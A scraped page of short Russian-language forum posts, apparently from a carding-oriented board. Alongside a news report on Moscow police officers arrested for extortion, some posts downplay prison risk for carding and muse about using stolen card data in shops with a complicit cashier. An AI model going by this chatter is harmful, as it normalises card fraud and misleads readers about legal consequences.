    МОГИЛА,да,ты прав. Тем более у каждого своя голова на плечах,пример есть,а сделать дальше можно как захочешь)
  43. 1 балл
    2 недели назад вызвал ментов т.к спалил пьяного мудака за рулем. ну и пиздец че
  44. 1 балл
    позволю себе не согласиться с тобой, по теме кардинга мало кого сажают, посадят если групой лиц или рецедив, а по первой дадут условку
  45. 1 балл
    Имеют ли право призывать человека, у который получил направление на хирургическое лечение?
  46. 1 балл
    - это только те деньги о которых стало известно, а на деле доля дохода мошенников намного выше ...
  47. 1 балл
    Басманный суд Москвы вынес постановление об аресте двух старших оперуполномоченных 5-го отдела оперативно-розыскного бюро (ОРБ) номер семь МВД РФ, подозреваемых в вымогательстве полумиллиона долларов. Они просили выпустить их под залог, но суд посчитал, что на свободе они могут помешать расследованию, сообщает агентство "Интерфакс". Алексей Ширшиков и Михаил Новиков были задержаны 2 февраля при получении первой части требуемой ими суммы - 200 тысяч долларов. В постановлении суда указано, что Новиков признался в преступлении и начал сотрудничать со следствием, дав показания, изобличающие Ширшикова. По версии следствия, милиционеры требовали у некоего предпринимателя 500 тысяч долларов за то, чтобы его не привлекли к уголовной ответственности. Следователи считают, что повлиять на расследование подозреваемые не могли, поэтому дело было возбуждено по статье "мошенничество". Как стало известно газете "Коммерсант", дело, которым милиционеры шантажировали бизнесмена, касается незаконного возврата НДС неким ООО "Марс" и находится в производстве Главного следственного управления (ГСУ) при ГУВД Москвы. По сведениям газеты, Управление собственной безопасности ФСБ разрабатывало 5-й отдел, приписанный к Департаменту экономической безопасности (ДЭБ МВД), в течение года. По версии ФСБ, "Марс" стал не первой жертвой вымогательства. Предположительно, милиционеры через знакомых в налоговой инспекции находили подозрительные фирмы, оперативной разработкой которых занимался Ширшиков. Затем следователь ГСУ Алексей Грузинский на основании собранных материалов заводил уголовные дела о незаконном возврате НДС, после чего руководству компаний предлагалось откупиться за миллион долларов. Адвокатам "Марса" удалось снизить сумму до полумиллиона. Проверяя 5-й отдел, сотрудники ФСБ выяснили, что в 2010 году ГСУ возбудило по материалам ОРБ номер 7, специализирующегося на борьбе с преступлениями в кредитно-финансовой сфере, 15 дел о махинациях с НДС. Однако ни одно из этих дел не дошло до суда. Кроме того, стало известно, что следователь Грузинский осенью 2010 года перевелся на Дальний Восток, где был арестован за мошенничество. После задержания Ширшикова и Новикова, как пишет "Коммерсант", в 5-ом отделе началась тотальная служебная проверка. На время ее проведения от исполнения обязанностей отстранен начальник отдела Дамир Файззулин.
  48. 1 балл
    Анонимности в интернете НЕТ!!! Можешь анонимно сидеть через левую сим-карту, но скорость не позволит многого!!
  49. 1 балл
    У нас ваще такая тема уже давно не катит, раньше сам экономил на международных звонках симки были минимум 1500р в долг, учитывая что продавались на каждом углу и БЕЗ ДОКУМЕНТОВ, потом лавочку прикрыли, опсоса называть не буду... Так что 400р это игрушки...
  50. 1 балл
    C пином не знаю, но если считать информацию, ну или расшифровать каким либо образом инфу о владельце, то можно прогонять их через супер маркеты, магазины и т.д , но ещё есть проблема, кассир который проводит твою покупку, попросит док. удостоверяющий личн.:ero50000, вот такая задача..... НО!!! Если кассир в теме??? Надо подумать..... Может ещё кто владеет вопросом.....?????
×
×
  • Создать...